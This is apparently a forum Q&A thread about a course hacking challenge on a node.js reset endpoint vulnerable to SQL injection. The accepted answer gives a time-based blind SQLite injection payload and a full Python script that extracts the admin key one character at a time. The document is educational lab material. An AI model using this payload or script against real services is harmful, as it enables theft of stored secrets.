# Find vulnerability in node.js web service to reveal secret key for admin

Tags: attacks, sql-injection, node.js

I've tried to solve the following "hacking" challenge  in order to get experience with web vulnerabilities.

The service is programmed in node.js and is accessible as http://lbs-course.askarov.net:3030:

```
app.post ("/reset/", function (req, res) {
    var user = req.body.username;
    if (!user) {
      res.send("no username provided");
    } else {
      db.get (
        "select * from users where username='" + user + "'",
        function (err, row) {
          // ...
          if (row) {
            // ... send email because we have a real response
          }
          res.send("password reset email has been queued");
        })
    }
})
```

The details for sending emails are irrelevant and are commented out (as in the challenge).

The data is stored in a simple SQLite 3 database. The users tables used by the service is created using the following SQL create query:

```
CREATE TABLE users(username text, passwordhash text, key text)
```

There exists at least one user in the database, with username `admin`.

**Goal:**

Obtain the private key for user `admin`.

**My attempt:**

I've tried SQL injection, e.g. with `user` set to `' OR ''='`, however nothing happens... Also, I've read articles about MS SQL supporting the `EXECUTE()` function, but I cannot find the equivalent in SQLite. With such a function, I could in principle execute shell commands like `nslookup`.

It is obvious that the only point where this service is vulnerable is the `db.get()` call, and since the details for sending emails are irrelevant, then I must somehow make the database send the private key for `admin` (reason for `EXECUTE()` call).

I'm stuck in this challenge after spending lots of hours, so I think it's time to ask the community for help.

Comment: You should always do your homework on your own. But as a hint, you are on the right track with sql injection. Just keep in mind that the resulting string needs to be valid sql syntax.

Comment: But what could I use in place of `EXECUTE()`? The string is valid?

Comment: You're overthinking it. The query already returns all the fields of the record that matches. You just need to pass it the information to get the record you want.

Comment: hint: you can do more than one thing in a "single" sql statement

Comment: 1. Try to create error 2. Then resolve it. 3. Crack it. --> this is how SQL injection works. Now, you atleast know, what the vulnerability is. You just need to think how to exploit it. If you don't know, how to exploit it, use Havij.

Comment: @dandavis - do you mean chain statements by using ';'?

Comment: @M.S.P - No matter what I enter no error is generated. Can you make it work? I cannot find any "legit" Havij download like online.

Comment: @Stephan - but how do I get it displayed?

Comment: Not sure if that is the issue here, but try to make sure that the query only returns one row. Making the query return multiple rows where only one is expected might break things. Your attemplt looks like it would return all rows.

Comment: @Anders - But still, I need the result displayed, and this is not possible through email functionality.

Comment: Hmm... The only output seems to be through the email, so my first guess would be to get it to send the email to you. That could be done if the email adress was picked from the database. But there is no column for it. And you have been explicitly told not to focus on the email sending?

Comment: Well, if the email functionality could be used to retrieve the key I'm open for any suggestions, but again, the details for sending emails are irrelevant to the challenge.

Comment: you're overthinking the query. pass in "admin" since you're guaranteed to have that user record. the parts you censored in the code are definitely relevant to determine where the data can be exfiltrated.

Comment: Thanks @Stephan - have you actually made it work, or are you suggesting things?

Comment: @Stephan - I didn't censor those parts. The challenge censored those parts.

Comment: @Stephan - Passing in "admin" just results in the generic response. More sophisticated queries like "admin';foo", which results in an error doesn't work either. Also, I've tried using sqlmap with no success.

Comment: Can you give more context of what course material has been covered as part of this assignment? We're all shooting in the dark.

Comment: Inspired by Section 4 of https://users-cs.au.dk/askarov/lbs-course/2017/reading/dc-15-meer_and_slaviero-WP.pdf. But the technique outlined there requires the ability to execute code using SQL. SQLite provides no support for an `EXECUTE()` function.

Comment: This challenge is harder than I expected. Since this is entry level, I thought the solution was obvious to experienced pentesters.

Comment: full blind injection seems a bit high for entry level.

Answer (score 2, accepted):

The application seems to be resilient to malformed SQL queries and does not output error information directly to the user. So, if the application will not explicitly output the stored key, then we should aim at retrieving it by other means.

A more subtle SQL injection technique is that of *timed SQL queries*: In order to gain information about what's stored in the database, we will ask queries that takes "long" time to execute if *successful*, otherwise they terminate "fast". The definition of *successful* depends on the application, but it would normally mean that our query returns a result. Also, "fast" and "long" execution times are parametrized by the application.

Now, since you know the database is an *SQLite* database, we should look for a function that would take "long" to execute. Some databases have the canonical choice of `SLEEP()` available, but SQLite does not provide such functionality. Instead, we could rely on the `RANDOMBLOB()`, which generates a sequence of random bits.

How long does `RANDOMBLOB()` takes to execute? Well, this should be measured by the attacker, and the resulting measure will (partly) determine the meaning of "fast" and "long" execution times. Indeed, it would be more accurate to use the `SLEEP()` function, but `RANDOMBLOB()` will suffice for our purposes.

Another function that will prove useful in extracting the key is `SUBSTR()`: We extract the key character-by-character with a "long" response meaning success, while a "fast" response means fail.

Since, we know that `admin` is guaranteed to be in the database, we send a POST-request with the following value for `username`:

```
"admin' AND substr(key,{pos},1) == '{ch}' AND 1 == randomblob({size}) --"
```

This string gets substituted for `user` by the application in the query string:

```
 "select * from users where username='" + user + "'"
```

This is turn yields:

```
"select * from users where username='admin' AND substr(key,{pos},1) == '{ch}' AND 1 == randomblob({size}) --'"
```

Indeed, we see that if `ch` match `key` at position `pos`, then `RANDOMBLOB()` gets executed and the response will take a "long" time to arrive. Otherwise, the response will arrive "fast".

A Python script to extract the secret (PGP) key:

Be aware that it might be necessary to adjust the `timeout` parameter according to server load and execution time of `RANDOMBLOB()`.

```
import requests
import socket
import string

url = 'http://lbs-course.askarov.net:3030/reset'
timeout = 6
size = 1000000000
key_len = 1000
rounds = 3

def main():
    key = ""
    for pos in range(1,key_len+1):
        for ch in string.printable:
            try:
                if test_key_index(pos, ch):
                    print("[INFO] Found key position {pos}: {ch}".format(pos=pos, ch=ch))
                    key = key + ch
                    break
            except KeyboardInterrupt as e:
                print("[INFO] Partial key obtained: {key}".format(key=key))
                return
    print("[INFO] Partial key obtained: {key}".format(key=key))

def test_key_index(pos, ch):
    query = "admin' AND substr(key,{pos},1) == '{ch}' AND 1 == randomblob({size}) --".format(pos=pos, ch=ch, size=size)
    #print(query)
    post_fields = {'username': query} # POST fields
    for _ in range(rounds):
        try:
            response = requests.post(url, data=post_fields, timeout=timeout)
            return False
        except requests.exceptions.Timeout as timeout_e:
            pass
    return True

if __name__ == '__main__':
    main()
```

Hope this helps!